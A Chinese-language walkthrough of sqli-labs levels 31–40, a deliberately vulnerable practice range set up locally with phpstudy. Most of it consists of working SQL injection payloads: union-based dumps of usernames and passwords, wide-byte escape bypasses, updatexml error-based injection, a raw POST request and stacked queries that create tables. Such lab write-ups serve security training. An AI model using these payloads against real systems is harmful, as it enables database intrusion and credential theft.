sql-lib靶场搭建-windows操作系统
下载phpstudy,下载地址:https://www.xp.cn/download.html
安装好
https://github.com/Audi-1/sqli-labs
将下载好后解压放到www下新建wwww.guiltyfet.com目录
同步hosts文件
第31关
在双引号后面添加括号进行闭合
http://www.guiltyfet.com/sqli/Less-31/?id=-1%22)union%20select%201,2,database()%20–+
或者
?id=1&id=0") union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23
区分大小写用%23闭合
获得用户名密码
http://www.guiltyfet.com/sqli/Less-31/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+
第32关
这关是宽字节绕过引号转义
原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6’ 这样的构造时,’ 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用。
获得数据库名 ?id=-1%E6’ union select 1,version(),database() --+
在爆列的时候我们要用到‘user’,有单引号,我们用十六进制编码替代,users 使用十六进制编码得到7573657273,构造为0x7573657273
获取列名 ?id=-1%E6' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name =0x7573657273--+
http://www.guiltyfet.com/sqli/Less-32/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+
第33关
和32一样
http://www.guiltyfet.com/sqli/Less-33/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+
第34关
获取数据库版本和数据库名 uname=admin%99’ union select version(),database()–+&passwd=admin&submit=Submit
POST /sqli/Less-34/ HTTP/1.1 Host: www.guiltyfet.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 125 Origin: http://www.guiltyfet.com Connection: close Referer: http://www.guiltyfet.com/sqli/Less-34/ Upgrade-Insecure-Requests: 1 uname=admin%99' union select 1,group_concat(username,0x3b,password) from users#&passwd=admin&passwd=admin&submit=Submit
获取数据库密码
第35关
获得版名库名
http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,version(),database()--+
获得表明
http://www.guiltyfet.com/sqli/Less-35/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
爆列名 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#
爆用户名和密码
http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,2,group_concat(username,0x3b,password)%20from%20users#
第36关
爆库
http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,database(),0x7e),1)--+
爆表
http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),0x7e),1)--+
通过宽字节 %df 或者utf-16来解决
爆用户密码
http://www.guiltyfet.com/sqli/Less-36/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+
宽字节注入
第37关
输入admin/admin抓包
%bb’ union select 1,2#
爆库 uname=admin%bb' union select database(),user()#&passwd=admin&submit=Submit
爆表 uname=admin%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=admin&submit=Submit
爆字段
admin%bb' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#
爆数据 uname=admin%bb' union select group_concat(username),group_concat(password) from users# &passwd=admin&submit=Submit
第38关
http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23
http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
获得列名 http://www.guiltyfet.com/sqli/Less-38/?id=?id=0%FE' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23
获得数据 http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
新建表 http://www.guiltyfet.com/sqli/Less-38/?id=1';create table test like users;%23
在查询就有新建的表
第39关
http://www.guiltyfet.com/sqli/Less-39/?id=0%20union%20select%201,version(),database()%20%23
获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23
获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
第40关
加括号,堆叠注入
获得列名 http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23
爆数据 http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
